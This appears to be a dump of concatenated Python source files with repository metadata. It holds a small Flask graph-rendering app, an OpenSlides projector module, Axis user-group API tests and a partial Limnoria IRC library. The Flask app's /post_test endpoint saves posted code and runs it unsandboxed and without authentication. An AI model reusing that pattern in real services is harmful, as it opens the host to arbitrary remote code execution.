| 17.916667 | 58 | 0.623256 |
b32b9395a0d1e5ddcfefcf27115d6895dd742dde | 2,120 | py | Python | do.py | JackLuSun/Financial-services-calculation | 92ba3c6fd7ced7df1e80b34083eef7f7d95a0a6d | [
"MIT"
] | null | null | null | do.py | JackLuSun/Financial-services-calculation | 92ba3c6fd7ced7df1e80b34083eef7f7d95a0a6d | [
"MIT"
] | null | null | null | do.py | JackLuSun/Financial-services-calculation | 92ba3c6fd7ced7df1e80b34083eef7f7d95a0a6d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sat Nov 2 23:50:01 2019
@author: jackl
GOAL: ๅผๅไธไธช็ฎ้็pythonๅจ็บฟ่ฟ่ก็ฝ็ซ๏ผๅๅฉ python ๅ็ซฏๆกๆถflask ๅฟซ้ๅฎ็ฐๅ็ซฏ็็ฎ่ฆๅผๅ
"""
from flask import Flask, request
import graphviz
import subprocess
app = Flask(__name__)
@app.route('/',methods=['GET'])# tell flask realation between URL and function who deals with the URL
def hello_world():
r=""
with open('index.html',encoding="utf8") as f:
r = f.read()
return r
def textPreprocess():
'''
ๅฏนๅๅง็ input.txt ๆไปถ่ฟ่กๆ ผๅผๅ๏ผ็ๆ็ฌฆๅ่ง่็ dot ๆบ็
'''
with open('input.txt') as f:# ๅฏน input.txt ่ฟ่กๆ ผๅผๅ๏ผไฝฟไน็ฌฆๅ graphviz ็ๅพๆ ผๅผ
lines = f.readlines()
graph = "digraph {\n"
r = [0]*2
for line in lines:
print(line)
pos = line.index(',')
line = line.strip()
r[0] = line[0:pos]
r[1] = line[pos+1:]
if '->' in r[0]: graph+=r[0]+' '+'[label = '+r[1]+"]\n"
else: graph+=r[0]+' '+'[label = '+r[1]+']\n'
graph+="}"
with open("graph.gv","w",encoding="utf8") as out: # ๅฐๆ ผๅผๅๅฎๆฏ็ๅพๆ ผๅผๆฐๆฎไฟๅญๅฐ graph ๆไปถไธญ
out.write(graph)
return
@app.route('/post_test',methods=['POST','GET'])# ๅ็ซฏๅๅ็ซฏๅ้่ฆๆง่ก็ๆบไปฃ็ ๆถ๏ผURLไธบ post_test ๅฏนๅบ็ๅ็ซฏ post ๆถๅๆๅฎ็ url
def get_tasks():
if request.method == 'POST':
code = request.get_json(force=True)['code']# ๅ็ซฏ้ฃ่พน้็จjson ๆ ผๅผ,ๅ็ซฏ็ฉฟ่ฟๆฅ็ๆฐๆฎๆๅฎๆพๅจไบ 'code' ๅ
ณ้ฎๅญๅฏนๅบ็ๅผ้
# ๅฐๅ็ซฏไผ ๆฅ็python ็จๅบไฟๅญๅนถๆง่ก
with open('code.py','w',encoding='utf8') as f:
f.write(code)
# ่ฟ่กๆต่งๅจๅๆฅ็ python ็จๅบ
# ่ฟไธช็จๅบๅบ่ฏฅ็ๆไธไธช input.txt ๆไปถ
subprocess.Popen(['python', 'code.py'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
textPreprocess()# ๅฏน่พๅ
ฅๆๆฌ่ฟ่กๅค็ ,ๅ
้จๆๅฎไบๅฏน input.txt ๆไปถ่ฟ่กๅค็
graph = graphviz.Source.from_file("graph.gv")# graph.gv ๅจๅฝๆฐ textPreproces ไธญไบง็๏ผๅฎๆฏไธไธช dot ๆบ็
graph.format = 'svg'
svg = graph.pipe().decode('utf-8')# ้่ฟ็ฎก้๏ผ็ดๆฅๅพๅฐ graph ่ฟไธช dot ๅฏน่ฑก็ svg ๆบ็
return svg # ๅฐๅพๆฐๆฎ่ฟๅ็ปๅ็ซฏ
return hello_world()
if __name__ == '__main__':
app.run(host='localhost',port='2333')
| 30.285714 | 101 | 0.574057 |
855d2767d9e57c56c6c31757e857f9c334aa5e40 | 3,421 | py | Python | openslides/utils/projector.py | rolandgeider/OpenSlides | 331141c17cb23da26e377d4285efdb4a50753a59 | [
"MIT"
] | null | null | null | openslides/utils/projector.py | rolandgeider/OpenSlides | 331141c17cb23da26e377d4285efdb4a50753a59 | [
"MIT"
] | null | null | null | openslides/utils/projector.py | rolandgeider/OpenSlides | 331141c17cb23da26e377d4285efdb4a50753a59 | [
"MIT"
] | null | null | null | from django.dispatch import Signal
from .dispatch import SignalConnectMetaClass
class ProjectorElement(object, metaclass=SignalConnectMetaClass):
"""
Base class for an element on the projector.
Every app which wants to add projector elements has to create classes
subclassing from this base class with different names. The name attribute
has to be set. The metaclass (SignalConnectMetaClass) does the rest of the
magic.
"""
signal = Signal()
name = None
def __init__(self, **kwargs):
"""
Initializes the projector element instance. This is done when the
signal is sent.
Because of Django's signal API, we have to take wildcard keyword
arguments. But they are not used here.
"""
pass
@classmethod
def get_dispatch_uid(cls):
"""
Returns the classname as a unique string for each class. Returns None
for the base class so it will not be connected to the signal.
"""
if not cls.__name__ == 'ProjectorElement':
return cls.__name__
def check_and_update_data(self, projector_object, config_entry):
"""
Checks projector element data via self.check_data() and updates
them via self.update_data(). The projector object and the config
entry have to be given.
"""
self.projector_object = projector_object
self.config_entry = config_entry
assert self.config_entry.get('name') == self.name, (
'To get data of a projector element, the correct config entry has to be given.')
self.check_data()
return self.update_data() or {}
def check_data(self):
"""
Method can be overridden to validate projector element data. This
may raise ProjectorException in case of an error.
Default: Does nothing.
"""
pass
def update_data(self):
"""
Method can be overridden to update the projector element data
output. This should return a dictonary. Use this for server
calculated data which have to be forwared to the client.
Default: Does nothing.
"""
pass
def get_requirements(self, config_entry):
"""
Returns an iterable of ProjectorRequirement instances to setup
which views should be accessable for projector clients if the
projector element is active. The config_entry has to be given.
"""
return ()
class ProjectorRequirement:
"""
Container for required views. Such a view is defined by its class, its
action and its kwargs which come from the URL path.
"""
def __init__(self, view_class, view_action, **kwargs):
self.view_class = view_class
self.view_action = view_action
self.kwargs = kwargs
def is_currently_required(self, view_instance):
"""
Returns True if the view_instance matches the initiated data of this
requirement.
"""
if not type(view_instance) == self.view_class:
result = False
elif not view_instance.action == self.view_action:
result = False
else:
result = True
for key in view_instance.kwargs:
if not self.kwargs[key] == view_instance.kwargs[key]:
result = False
break
return result
| 32.894231 | 92 | 0.635779 |
9ecf35fbe2b3c3e16fd6b1a23057f74f226a15b2 | 2,713 | py | Python | tests/test_user_groups.py | drewclauson/axis | be4be74a0242e499cd10a8a9b96c9ec76fa04f88 | [
"MIT"
] | 16 | 2018-05-29T20:07:04.000Z | 2022-01-27T14:15:16.000Z | tests/test_user_groups.py | Kane610/axis | 240c42f7cbad2358f0463d5234a82678532f9549 | [
"MIT"
] | 27 | 2017-11-05T12:14:17.000Z | 2022-02-07T08:07:48.000Z | tests/test_user_groups.py | drewclauson/axis | be4be74a0242e499cd10a8a9b96c9ec76fa04f88 | [
"MIT"
] | 6 | 2019-10-03T07:59:49.000Z | 2021-07-18T16:57:28.000Z | """Test Axis user groups API.
pytest --cov-report term-missing --cov=axis.user_groups tests/test_user_groups.py
"""
import pytest
import respx
from axis.user_groups import URL, UserGroups
from .conftest import HOST
@pytest.fixture
def user_groups(axis_device) -> UserGroups:
"""Returns the user_groups mock object."""
return UserGroups("", axis_device.vapix.request)
@respx.mock
@pytest.mark.asyncio
async def test_empty_response(user_groups):
"""Test get_supported_versions"""
respx.get(f"http://{HOST}:80{URL}").respond(
text="",
headers={"Content-Type": "text/plain"},
)
await user_groups.update()
assert user_groups.privileges == "unknown"
assert not user_groups.admin
assert not user_groups.operator
assert not user_groups.viewer
assert not user_groups.ptz
@respx.mock
@pytest.mark.asyncio
async def test_root_user(user_groups):
"""Test get_supported_versions"""
respx.get(f"http://{HOST}:80{URL}").respond(
text="root\nroot admin operator ptz viewer\n",
headers={"Content-Type": "text/plain"},
)
await user_groups.update()
assert user_groups.privileges == "admin"
assert user_groups.admin
assert user_groups.operator
assert user_groups.viewer
assert user_groups.ptz
@respx.mock
@pytest.mark.asyncio
async def test_admin_user(user_groups):
"""Test get_supported_versions"""
respx.get(f"http://{HOST}:80{URL}").respond(
text="administrator\nusers admin operator ptz viewer\n",
headers={"Content-Type": "text/plain"},
)
await user_groups.update()
assert user_groups.privileges == "admin"
assert user_groups.admin
assert user_groups.operator
assert user_groups.viewer
assert user_groups.ptz
@respx.mock
@pytest.mark.asyncio
async def test_operator_user(user_groups):
"""Test get_supported_versions"""
respx.get(f"http://{HOST}:80{URL}").respond(
text="operator\nusers operator viewer\n",
headers={"Content-Type": "text/plain"},
)
await user_groups.update()
assert user_groups.privileges == "operator"
assert not user_groups.admin
assert user_groups.operator
assert user_groups.viewer
assert not user_groups.ptz
@respx.mock
@pytest.mark.asyncio
async def test_viewer_user(user_groups):
"""Test get_supported_versions"""
respx.get(f"http://{HOST}:80{URL}").respond(
text="viewer\nusers viewer\n",
headers={"Content-Type": "text/plain"},
)
await user_groups.update()
assert user_groups.privileges == "viewer"
assert not user_groups.admin
assert not user_groups.operator
assert user_groups.viewer
assert not user_groups.ptz
| 25.838095 | 81 | 0.7007 |
eb5923aaf391d0a6b666a746de79e2411d43d7ad | 56,426 | py | Python | src/irclib.py | ProgVal/Limnoria-test | 05179cec2f2548f1d48a8e9049e88634f7a68fbd | [
"BSD-3-Clause"
] | null | null | null | src/irclib.py | ProgVal/Limnoria-test | 05179cec2f2548f1d48a8e9049e88634f7a68fbd | [
"BSD-3-Clause"
] | null | null | null | src/irclib.py | ProgVal/Limnoria-test | 05179cec2f2548f1d48a8e9049e88634f7a68fbd | [
"BSD-3-Clause"
] | null | null | null | ###
# Copyright (c) 2002-2005 Jeremiah Fincher
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import re
import copy
import time
import random
import base64
import collections
try:
from ecdsa import SigningKey, BadDigestError
ecdsa = True
except ImportError:
ecdsa = False
from . import conf, ircdb, ircmsgs, ircutils, log, utils, world
from .utils.str import rsplit
from .utils.iter import chain
from .utils.structures import smallqueue, RingBuffer
###
# The base class for a callback to be registered with an Irc object. Shows
# the required interface for callbacks -- name(),
# inFilter(irc, msg), outFilter(irc, msg), and __call__(irc, msg) [used so as
# to make functions used as callbacks conceivable, and so if refactoring ever
# changes the nature of the callbacks from classes to functions, syntactical
# changes elsewhere won't be required.]
###
class IrcCommandDispatcher(object):
"""Base class for classes that must dispatch on a command."""
def dispatchCommand(self, command):
"""Given a string 'command', dispatches to doCommand."""
return getattr(self, 'do' + command.capitalize(), None)
class IrcCallback(IrcCommandDispatcher, log.Firewalled):
"""Base class for standard callbacks.
Callbacks derived from this class should have methods of the form
"doCommand" -- doPrivmsg, doNick, do433, etc. These will be called
on matching messages.
"""
callAfter = ()
callBefore = ()
__firewalled__ = {'die': None,
'reset': None,
'__call__': None,
'inFilter': lambda self, irc, msg: msg,
'outFilter': lambda self, irc, msg: msg,
'name': lambda self: self.__class__.__name__,
'callPrecedence': lambda self, irc: ([], []),
}
def __init__(self, *args, **kwargs):
#object doesn't take any args, so the buck stops here.
#super(IrcCallback, self).__init__(*args, **kwargs)
pass
def __repr__(self):
return '<%s %s %s>' % \
(self.__class__.__name__, self.name(), object.__repr__(self))
def name(self):
"""Returns the name of the callback."""
return self.__class__.__name__
def callPrecedence(self, irc):
"""Returns a pair of (callbacks to call before me,
callbacks to call after me)"""
after = []
before = []
for name in self.callBefore:
cb = irc.getCallback(name)
if cb is not None:
after.append(cb)
for name in self.callAfter:
cb = irc.getCallback(name)
if cb is not None:
before.append(cb)
assert self not in after, '%s was in its own after.' % self.name()
assert self not in before, '%s was in its own before.' % self.name()
return (before, after)
def inFilter(self, irc, msg):
"""Used for filtering/modifying messages as they're entering.
ircmsgs.IrcMsg objects are immutable, so this method is expected to
return another ircmsgs.IrcMsg object. Obviously the same IrcMsg
can be returned.
"""
return msg
def outFilter(self, irc, msg):
"""Used for filtering/modifying messages as they're leaving.
As with inFilter, an IrcMsg is returned.
"""
return msg
def __call__(self, irc, msg):
"""Used for handling each message."""
method = self.dispatchCommand(msg.command)
if method is not None:
method(irc, msg)
def reset(self):
"""Resets the callback. Called when reconnecting to the server."""
pass
def die(self):
"""Makes the callback die. Called when the parent Irc object dies."""
pass
###
# Basic queue for IRC messages. It doesn't presently (but should at some
# later point) reorder messages based on priority or penalty calculations.
###
_high = frozenset(['MODE', 'KICK', 'PONG', 'NICK', 'PASS', 'CAPAB'])
_low = frozenset(['PRIVMSG', 'PING', 'WHO', 'NOTICE', 'JOIN'])
class IrcMsgQueue(object):
"""Class for a queue of IrcMsgs. Eventually, it should be smart.
Probably smarter than it is now, though it's gotten quite a bit smarter
than it originally was. A method to "score" methods, and a heapq to
maintain a priority queue of the messages would be the ideal way to do
intelligent queuing.
As it stands, however, we simply keep track of 'high priority' messages,
'low priority' messages, and normal messages, and just make sure to return
the 'high priority' ones before the normal ones before the 'low priority'
ones.
"""
__slots__ = ('msgs', 'highpriority', 'normal', 'lowpriority', 'lastJoin')
def __init__(self, iterable=()):
self.reset()
for msg in iterable:
self.enqueue(msg)
def reset(self):
"""Clears the queue."""
self.lastJoin = 0
self.highpriority = smallqueue()
self.normal = smallqueue()
self.lowpriority = smallqueue()
def enqueue(self, msg):
"""Enqueues a given message."""
if msg in self and \
conf.supybot.protocols.irc.queuing.duplicates():
s = str(msg).strip()
log.info('Not adding message %q to queue, already added.', s)
return False
else:
if msg.command in _high:
self.highpriority.enqueue(msg)
elif msg.command in _low:
self.lowpriority.enqueue(msg)
else:
self.normal.enqueue(msg)
return True
def dequeue(self):
"""Dequeues a given message."""
msg = None
if self.highpriority:
msg = self.highpriority.dequeue()
elif self.normal:
msg = self.normal.dequeue()
elif self.lowpriority:
msg = self.lowpriority.dequeue()
if msg.command == 'JOIN':
limit = conf.supybot.protocols.irc.queuing.rateLimit.join()
now = time.time()
if self.lastJoin + limit <= now:
self.lastJoin = now
else:
self.lowpriority.enqueue(msg)
msg = None
return msg
def __contains__(self, msg):
return msg in self.normal or \
msg in self.lowpriority or \
msg in self.highpriority
def __bool__(self):
return bool(self.highpriority or self.normal or self.lowpriority)
__nonzero__ = __bool__
def __len__(self):
return len(self.highpriority)+len(self.lowpriority)+len(self.normal)
def __repr__(self):
name = self.__class__.__name__
return '%s(%r)' % (name, list(chain(self.highpriority,
self.normal,
self.lowpriority)))
__str__ = __repr__
###
# Maintains the state of IRC connection -- the most recent messages, the
# status of various modes (especially ops/halfops/voices) in channels, etc.
###
class ChannelState(utils.python.Object):
__slots__ = ('users', 'ops', 'halfops', 'bans',
'voices', 'topic', 'modes', 'created')
def __init__(self):
self.topic = ''
self.created = 0
self.ops = ircutils.IrcSet()
self.bans = ircutils.IrcSet()
self.users = ircutils.IrcSet()
self.voices = ircutils.IrcSet()
self.halfops = ircutils.IrcSet()
self.modes = {}
def isOp(self, nick):
return nick in self.ops
def isOpPlus(self, nick):
return nick in self.ops
def isVoice(self, nick):
return nick in self.voices
def isVoicePlus(self, nick):
return nick in self.voices or nick in self.halfops or nick in self.ops
def isHalfop(self, nick):
return nick in self.halfops
def isHalfopPlus(self, nick):
return nick in self.halfops or nick in self.ops
def addUser(self, user):
"Adds a given user to the ChannelState. Power prefixes are handled."
nick = user.lstrip('@%+&~!')
if not nick:
return
# & is used to denote protected users in UnrealIRCd
# ~ is used to denote channel owner in UnrealIRCd
# ! is used to denote protected users in UltimateIRCd
while user and user[0] in '@%+&~!':
(marker, user) = (user[0], user[1:])
assert user, 'Looks like my caller is passing chars, not nicks.'
if marker in '@&~!':
self.ops.add(nick)
elif marker == '%':
self.halfops.add(nick)
elif marker == '+':
self.voices.add(nick)
self.users.add(nick)
def replaceUser(self, oldNick, newNick):
"""Changes the user oldNick to newNick; used for NICK changes."""
# Note that this doesn't have to have the sigil (@%+) that users
# have to have for addUser; it just changes the name of the user
# without changing any of their categories.
for s in (self.users, self.ops, self.halfops, self.voices):
if oldNick in s:
s.remove(oldNick)
s.add(newNick)
def removeUser(self, user):
"""Removes a given user from the channel."""
self.users.discard(user)
self.ops.discard(user)
self.halfops.discard(user)
self.voices.discard(user)
def setMode(self, mode, value=None):
assert mode not in 'ovhbeq'
self.modes[mode] = value
def unsetMode(self, mode):
assert mode not in 'ovhbeq'
if mode in self.modes:
del self.modes[mode]
def doMode(self, msg):
def getSet(c):
if c == 'o':
Set = self.ops
elif c == 'v':
Set = self.voices
elif c == 'h':
Set = self.halfops
elif c == 'b':
Set = self.bans
else: # We don't care yet, so we'll just return an empty set.
Set = set()
return Set
for (mode, value) in ircutils.separateModes(msg.args[1:]):
(action, modeChar) = mode
if modeChar in 'ovhbeq': # We don't handle e or q yet.
Set = getSet(modeChar)
if action == '-':
Set.discard(value)
elif action == '+':
Set.add(value)
else:
if action == '+':
self.setMode(modeChar, value)
else:
assert action == '-'
self.unsetMode(modeChar)
def __getstate__(self):
return [getattr(self, name) for name in self.__slots__]
def __setstate__(self, t):
for (name, value) in zip(self.__slots__, t):
setattr(self, name, value)
def __eq__(self, other):
ret = True
for name in self.__slots__:
ret = ret and getattr(self, name) == getattr(other, name)
return ret
Batch = collections.namedtuple('Batch', 'type arguments messages')
class IrcState(IrcCommandDispatcher, log.Firewalled):
"""Maintains state of the Irc connection. Should also become smarter.
"""
__firewalled__ = {'addMsg': None}
def __init__(self, history=None, supported=None,
nicksToHostmasks=None, channels=None,
capabilities_ack=None, capabilities_nak=None,
capabilities_ls=None):
if history is None:
history = RingBuffer(conf.supybot.protocols.irc.maxHistoryLength())
if supported is None:
supported = utils.InsensitivePreservingDict()
if nicksToHostmasks is None:
nicksToHostmasks = ircutils.IrcDict()
if channels is None:
channels = ircutils.IrcDict()
self.capabilities_ack = capabilities_ack or set()
self.capabilities_nak = capabilities_nak or set()
self.capabilities_ls = capabilities_ls or {}
self.ircd = None
self.supported = supported
self.history = history
self.channels = channels
self.nicksToHostmasks = nicksToHostmasks
self.batches = {}
def reset(self):
"""Resets the state to normal, unconnected state."""
self.history.reset()
self.channels.clear()
self.supported.clear()
self.nicksToHostmasks.clear()
self.history.resize(conf.supybot.protocols.irc.maxHistoryLength())
self.batches = {}
def __reduce__(self):
return (self.__class__, (self.history, self.supported,
self.nicksToHostmasks, self.channels))
def __eq__(self, other):
return self.history == other.history and \
self.channels == other.channels and \
self.supported == other.supported and \
self.nicksToHostmasks == other.nicksToHostmasks and \
self.batches == other.batches
def __ne__(self, other):
return not self == other
def copy(self):
ret = self.__class__()
ret.history = copy.deepcopy(self.history)
ret.nicksToHostmasks = copy.deepcopy(self.nicksToHostmasks)
ret.channels = copy.deepcopy(self.channels)
ret.batches = copy.deepcopy(self.batches)
return ret
def addMsg(self, irc, msg):
"""Updates the state based on the irc object and the message."""
self.history.append(msg)
if ircutils.isUserHostmask(msg.prefix) and not msg.command == 'NICK':
self.nicksToHostmasks[msg.nick] = msg.prefix
if 'batch' in msg.server_tags:
batch = msg.server_tags['batch']
assert batch in self.batches, \
'Server references undeclared batch %s' % batch
self.batches[batch].messages.append(msg)
method = self.dispatchCommand(msg.command)
if method is not None:
method(irc, msg)
def getTopic(self, channel):
"""Returns the topic for a given channel."""
return self.channels[channel].topic
def nickToHostmask(self, nick):
"""Returns the hostmask for a given nick."""
return self.nicksToHostmasks[nick]
def do004(self, irc, msg):
"""Handles parsing the 004 reply
Supported user and channel modes are cached"""
# msg.args = [nick, server, ircd-version, umodes, modes,
# modes that require arguments? (non-standard)]
self.ircd = msg.args[2]
self.supported['umodes'] = frozenset(msg.args[3])
self.supported['chanmodes'] = frozenset(msg.args[4])
_005converters = utils.InsensitivePreservingDict({
'modes': int,
'keylen': int,
'nicklen': int,
'userlen': int,
'hostlen': int,
'kicklen': int,
'awaylen': int,
'silence': int,
'topiclen': int,
'channellen': int,
'maxtargets': int,
'maxnicklen': int,
'maxchannels': int,
'watch': int, # DynastyNet, EnterTheGame
})
def _prefixParser(s):
if ')' in s:
(left, right) = s.split(')')
assert left[0] == '(', 'Odd PREFIX in 005: %s' % s
left = left[1:]
assert len(left) == len(right), 'Odd PREFIX in 005: %s' % s
return dict(list(zip(left, right)))
else:
return dict(list(zip('ovh', s)))
_005converters['prefix'] = _prefixParser
del _prefixParser
def _maxlistParser(s):
modes = ''
limits = []
pairs = s.split(',')
for pair in pairs:
(mode, limit) = pair.split(':', 1)
modes += mode
limits += (int(limit),) * len(mode)
return dict(list(zip(modes, limits)))
_005converters['maxlist'] = _maxlistParser
del _maxlistParser
def _maxbansParser(s):
# IRCd using a MAXLIST style string (IRCNet)
if ':' in s:
modes = ''
limits = []
pairs = s.split(',')
for pair in pairs:
(mode, limit) = pair.split(':', 1)
modes += mode
limits += (int(limit),) * len(mode)
d = dict(list(zip(modes, limits)))
assert 'b' in d
return d['b']
else:
return int(s)
_005converters['maxbans'] = _maxbansParser
del _maxbansParser
def do005(self, irc, msg):
for arg in msg.args[1:-1]: # 0 is nick, -1 is "are supported"
if '=' in arg:
(name, value) = arg.split('=', 1)
converter = self._005converters.get(name, lambda x: x)
try:
self.supported[name] = converter(value)
except Exception:
log.exception('Uncaught exception in 005 converter:')
log.error('Name: %s, Converter: %s', name, converter)
else:
self.supported[arg] = None
def do352(self, irc, msg):
# WHO reply.
(nick, user, host) = (msg.args[5], msg.args[2], msg.args[3])
hostmask = '%s!%s@%s' % (nick, user, host)
self.nicksToHostmasks[nick] = hostmask
def do354(self, irc, msg):
# WHOX reply.
if len(msg.args) != 6 or msg.args[1] != '1':
return
(__, ___, user, host, nick, ___) = msg.args
hostmask = '%s!%s@%s' % (nick, user, host)
self.nicksToHostmasks[nick] = hostmask
def do353(self, irc, msg):
# NAMES reply.
(__, type, channel, items) = msg.args
if channel not in self.channels:
self.channels[channel] = ChannelState()
c = self.channels[channel]
for item in items.split():
if ircutils.isUserHostmask(item):
name = ircutils.nickFromHostmask(item)
self.nicksToHostmasks[name] = name
else:
name = item
c.addUser(name)
if type == '@':
c.modes['s'] = None
def doChghost(self, irc, msg):
(user, host) = msg.args
nick = msg.nick
hostmask = '%s!%s@%s' % (nick, user, host)
self.nicksToHostmasks[nick] = hostmask
def doJoin(self, irc, msg):
for channel in msg.args[0].split(','):
if channel in self.channels:
self.channels[channel].addUser(msg.nick)
elif msg.nick: # It must be us.
chan = ChannelState()
chan.addUser(msg.nick)
self.channels[channel] = chan
# I don't know why this assert was here.
#assert msg.nick == irc.nick, msg
def do367(self, irc, msg):
# Example:
# :server 367 user #chan some!random@user evil!channel@op 1356276459
try:
state = self.channels[msg.args[1]]
except KeyError:
# We have been kicked of the channel before the server replied to
# the MODE +b command.
pass
else:
state.bans.add(msg.args[2])
def doMode(self, irc, msg):
channel = msg.args[0]
if ircutils.isChannel(channel): # There can be user modes, as well.
try:
chan = self.channels[channel]
except KeyError:
chan = ChannelState()
self.channels[channel] = chan
chan.doMode(msg)
def do324(self, irc, msg):
channel = msg.args[1]
try:
chan = self.channels[channel]
except KeyError:
chan = ChannelState()
self.channels[channel] = chan
for (mode, value) in ircutils.separateModes(msg.args[2:]):
modeChar = mode[1]
if mode[0] == '+' and mode[1] not in 'ovh':
chan.setMode(modeChar, value)
elif mode[0] == '-' and mode[1] not in 'ovh':
chan.unsetMode(modeChar)
def do329(self, irc, msg):
# This is the last part of an empty mode.
channel = msg.args[1]
try:
chan = self.channels[channel]
except KeyError:
chan = ChannelState()
self.channels[channel] = chan
chan.created = int(msg.args[2])
def doPart(self, irc, msg):
for channel in msg.args[0].split(','):
try:
chan = self.channels[channel]
except KeyError:
continue
if ircutils.strEqual(msg.nick, irc.nick):
del self.channels[channel]
else:
chan.removeUser(msg.nick)
def doKick(self, irc, msg):
(channel, users) = msg.args[:2]
chan = self.channels[channel]
for user in users.split(','):
if ircutils.strEqual(user, irc.nick):
del self.channels[channel]
return
else:
chan.removeUser(user)
def doQuit(self, irc, msg):
channel_names = ircutils.IrcSet()
for (name, channel) in self.channels.items():
if msg.nick in channel.users:
channel_names.add(name)
channel.removeUser(msg.nick)
# Remember which channels the user was on
msg.tag('channels', channel_names)
if msg.nick in self.nicksToHostmasks:
# If we're quitting, it may not be.
del self.nicksToHostmasks[msg.nick]
def doTopic(self, irc, msg):
if len(msg.args) == 1:
return # Empty TOPIC for information. Does not affect state.
try:
chan = self.channels[msg.args[0]]
chan.topic = msg.args[1]
except KeyError:
pass # We don't have to be in a channel to send a TOPIC.
def do332(self, irc, msg):
chan = self.channels[msg.args[1]]
chan.topic = msg.args[2]
def doNick(self, irc, msg):
newNick = msg.args[0]
oldNick = msg.nick
try:
if msg.user and msg.host:
# Nick messages being handed out from the bot itself won't
# have the necessary prefix to make a hostmask.
newHostmask = ircutils.joinHostmask(newNick,msg.user,msg.host)
self.nicksToHostmasks[newNick] = newHostmask
del self.nicksToHostmasks[oldNick]
except KeyError:
pass
channel_names = ircutils.IrcSet()
for (name, channel) in self.channels.items():
if msg.nick in channel.users:
channel_names.add(name)
channel.replaceUser(oldNick, newNick)
msg.tag('channels', channel_names)
def doBatch(self, irc, msg):
batch_name = msg.args[0][1:]
if msg.args[0].startswith('+'):
batch_type = msg.args[1]
batch_arguments = tuple(msg.args[2:])
self.batches[batch_name] = Batch(type=batch_type,
arguments=batch_arguments, messages=[])
elif msg.args[0].startswith('-'):
batch = self.batches.pop(batch_name)
msg.tag('batch', batch)
else:
assert False, msg.args[0]
###
# The basic class for handling a connection to an IRC server. Accepts
# callbacks of the IrcCallback interface. Public attributes include 'driver',
# 'queue', and 'state', in addition to the standard nick/user/ident attributes.
###
_callbacks = []
class Irc(IrcCommandDispatcher, log.Firewalled):
"""The base class for an IRC connection.
Handles PING commands already.
"""
__firewalled__ = {'die': None,
'feedMsg': None,
'takeMsg': None,}
_nickSetters = set(['001', '002', '003', '004', '250', '251', '252',
'254', '255', '265', '266', '372', '375', '376',
'333', '353', '332', '366', '005'])
# We specifically want these callbacks to be common between all Ircs,
# that's why we don't do the normal None default with a check.
def __init__(self, network, callbacks=_callbacks):
self.zombie = False
world.ircs.append(self)
self.network = network
self.startedAt = time.time()
self.callbacks = callbacks
self.state = IrcState()
self.queue = IrcMsgQueue()
self.fastqueue = smallqueue()
self.driver = None # The driver should set this later.
self._setNonResettingVariables()
self._queueConnectMessages()
self.startedSync = ircutils.IrcDict()
self.monitoring = ircutils.IrcDict()
def isChannel(self, s):
"""Helper function to check whether a given string is a channel on
the network this Irc object is connected to."""
kw = {}
if 'chantypes' in self.state.supported:
kw['chantypes'] = self.state.supported['chantypes']
if 'channellen' in self.state.supported:
kw['channellen'] = self.state.supported['channellen']
return ircutils.isChannel(s, **kw)
def isNick(self, s):
kw = {}
if 'nicklen' in self.state.supported:
kw['nicklen'] = self.state.supported['nicklen']
return ircutils.isNick(s, **kw)
# This *isn't* threadsafe!
def addCallback(self, callback):
"""Adds a callback to the callbacks list.
:param callback: A callback object
:type callback: supybot.irclib.IrcCallback
"""
assert not self.getCallback(callback.name())
self.callbacks.append(callback)
# This is the new list we're building, which will be tsorted.
cbs = []
# The vertices are self.callbacks itself. Now we make the edges.
edges = set()
for cb in self.callbacks:
(before, after) = cb.callPrecedence(self)
assert cb not in after, 'cb was in its own after.'
assert cb not in before, 'cb was in its own before.'
for otherCb in before:
edges.add((otherCb, cb))
for otherCb in after:
edges.add((cb, otherCb))
def getFirsts():
firsts = set(self.callbacks) - set(cbs)
for (before, after) in edges:
firsts.discard(after)
return firsts
firsts = getFirsts()
while firsts:
# Then we add these to our list of cbs, and remove all edges that
# originate with these cbs.
for cb in firsts:
cbs.append(cb)
edgesToRemove = []
for edge in edges:
if edge[0] is cb:
edgesToRemove.append(edge)
for edge in edgesToRemove:
edges.remove(edge)
firsts = getFirsts()
assert len(cbs) == len(self.callbacks), \
'cbs: %s, self.callbacks: %s' % (cbs, self.callbacks)
self.callbacks[:] = cbs
def getCallback(self, name):
"""Gets a given callback by name."""
name = name.lower()
for callback in self.callbacks:
if callback.name().lower() == name:
return callback
else:
return None
def removeCallback(self, name):
"""Removes a callback from the callback list."""
name = name.lower()
def nameMatches(cb):
return cb.name().lower() == name
(bad, good) = utils.iter.partition(nameMatches, self.callbacks)
self.callbacks[:] = good
return bad
def queueMsg(self, msg):
"""Queues a message to be sent to the server."""
if not self.zombie:
return self.queue.enqueue(msg)
else:
log.warning('Refusing to queue %r; %s is a zombie.', msg, self)
return False
def sendMsg(self, msg):
"""Queues a message to be sent to the server *immediately*"""
if not self.zombie:
self.fastqueue.enqueue(msg)
else:
log.warning('Refusing to send %r; %s is a zombie.', msg, self)
def takeMsg(self):
"""Called by the IrcDriver; takes a message to be sent."""
